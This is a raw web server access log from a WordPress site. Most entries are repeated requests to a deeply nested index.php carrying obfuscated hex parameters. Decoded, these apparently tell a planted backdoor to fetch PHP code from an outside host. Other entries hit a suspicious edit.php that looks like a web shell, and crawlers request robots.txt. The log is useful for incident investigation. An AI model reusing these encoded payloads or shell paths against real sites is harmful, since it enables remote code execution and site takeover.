179.188.53.243 - - [15/Mar/2026:02:13:12 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353138372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313538372q3566633538343632363662303932643531353466383439363964363530363065222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
66.249.74.160 - - [15/Mar/2026:02:18:24 -0300] "GET /robots.txt HTTP/1.1" 200 447 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [15/Mar/2026:02:13:33 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353231332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313631332q3937363034663539373036303232633238346361646230326461333736643535222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:13:54 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353233342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313633342q3130313735646564666136616363646339373337326538333464343538313133222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:17:27 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:14:15 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353235352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313635352q6533333931373762653832663536316334366437613633346532353833383639222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:14:38 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353237382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313637382q3736306336666332393831323639663664313131646333316661653539373061222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [15/Mar/2026:02:19:45 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:02:14:59 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353239392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313639392q3238316566306536656238653834643738356532623538376265393932383139222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:15:21 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353332312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313732312q6239616330663533663639633638613334346332336632646662656335313832222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:19:00 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:15:42 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353334322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313734322q6566363635323461623735613731646135666133623435303735323836356364222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:16:04 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353336342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313736342q6461663135333265653339653535393934356537613034623965663830646262222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:16:25 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353338352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313738352q3531316131333663663031383762623636633663653539323833353134303037222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:16:46 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353430362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313830362q3439306134303764326663323835346566613064303232373035316564663639222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:20:34 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:17:08 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353432382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313832382q3865653736616634376236626338343235376363393962633133333963653733222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [15/Mar/2026:02:22:15 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:02:17:29 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353434392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313834392q3730393839396166653136323337353137623261396534396638303730336465222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:17:50 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353437302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313837302q6162643331363639623437643934346165626563623466326363643732306533222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:18:11 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353439312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313839312q3262633538343263623738656634336563336263393334656363666663376433222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:18:33 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353531332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313931332q3962313962376639623739653331333735373630363936646464336139666138222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:22:06 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:18:54 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353533342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313933342q3330656236666362346638613732323434376366623661376662343666663366222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:19:16 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353535362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313935362q3466656637346531376162316132663865326662363832353332326465646662222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
95.111.234.66 95.111.234.66 - - [15/Mar/2026:02:23:58 -0300] "GET / HTTP/1.1" 200 72780 "-" "Go-http-client/1.1"
179.188.53.243 - - [15/Mar/2026:02:19:37 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353537372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313937372q6538333464383964306264306261306639373439306333613636376665626535222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [15/Mar/2026:02:24:50 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:02:19:58 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353539382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535313939382q6238303631633635343938656633653866383166623538306562373832363838222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:23:39 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:20:21 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353632312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535323032312q3638303263663462393331383936356562346333323262356533316364376336222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:20:43 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353634332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535323034332q6536663431623037313235396136326163366134323536656435643164356536222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:21:05 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353636352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535323036352q6330343965656532386164356165303335623036636530353065303132663237222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:21:26 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353638362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535323038362q6537663938663666313262333865343536376363326438643936303136353833222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:02:25:14 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:02:21:47 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353730372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535323130372q3537303239343435396639343937666633626339643737613065633433623739222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:22:09 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353732392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535323132392q6331366364623265663431323137306134313532646665636532303665303232222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:22:30 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353735302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535323135302q3464346665653861366461363137376336646231613638666535666466396134222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [15/Mar/2026:02:27:45 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:02:22:51 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353737312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535323137312q6437353861303761373130613364613762363539333035323133643435656662222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:02:23:12 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535353739322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535323139322q3236656365623637626666336135633531313461303036386261343565306235222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
